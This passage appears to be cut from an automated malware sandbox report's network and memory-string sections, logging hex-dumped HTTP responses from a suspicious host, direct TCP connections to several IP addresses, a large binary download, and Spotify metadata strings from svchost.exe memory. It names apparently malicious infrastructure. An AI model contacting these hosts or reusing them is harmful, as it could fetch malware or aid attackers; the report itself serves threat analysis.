6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:29:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 46 e8 ae 88 70 bc 57 dd 43 df f9 21 87 26 ec c3 91 50 23 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9FpWC!&P#c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 0f 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OU:@Rw0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 62 6e b8 57 df ef 66 b1 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevbnWfdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 60 4d 87 33 c5 de 66 b2 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTev`M3fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 49 eb ab 85 70 bc 57 dd 40 d7 fe 26 83 22 eb c3 93 58 28 e3 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9IpW@&"X(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close | Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c0 d7 10 55 3a 40 a9 fe c2 aa b9 01 ac 52 cc 77 f8 02 0a c1 54 a3 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a | Data Ascii: 2dI:82OU:@RwT,/0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 22:30:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: close | Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 22:30:34 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytes
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.186.142.166
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.233.81.115
                          Source: unknown | TCP traffic detected without corresponding DNS query: 185.7.214.171
                          Source: svchost.exe, 0000001C.00000003.508353183.0000023922589000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
                          Source: svchost.exe, 0000001C.00000003.508353183.0000023922589000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
                          Source: svchost.exe, 0000001C.00000003.508353183.0000023922589000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.508444702.000002392259A000.00000004.00000001.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","